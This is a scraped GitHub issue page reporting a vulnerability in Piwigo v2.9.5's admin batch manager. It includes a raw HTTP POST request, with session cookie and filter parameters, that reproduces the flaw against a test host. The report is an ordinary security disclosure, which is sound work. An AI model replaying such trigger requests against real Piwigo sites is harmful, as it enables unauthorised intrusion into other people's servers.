Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
hi,There is a vulnerability in the admin/batch_manager.php.
I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.
POST /admin.php?page=batch_manager HTTP/1.1 Host: 10.150.10.186:30002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://10.150.10.186:30002/admin.php?page=batch_manager Content-Type: application/x-www-form-urlencoded Content-Length: 695 Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0 Connection: close Upgrade-Insecure-Requests: 1 start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560& filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level= 0®enerateSuccess=0®enerateError=0
The text was updated successfully, but these errors were encountered:
discovered on Piwigo v2.9.5
Sorry, something went wrong.
fccb6ca
plegall
No branches or pull requests
hi,There is a vulnerability in the admin/batch_manager.php.

I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.
The text was updated successfully, but these errors were encountered: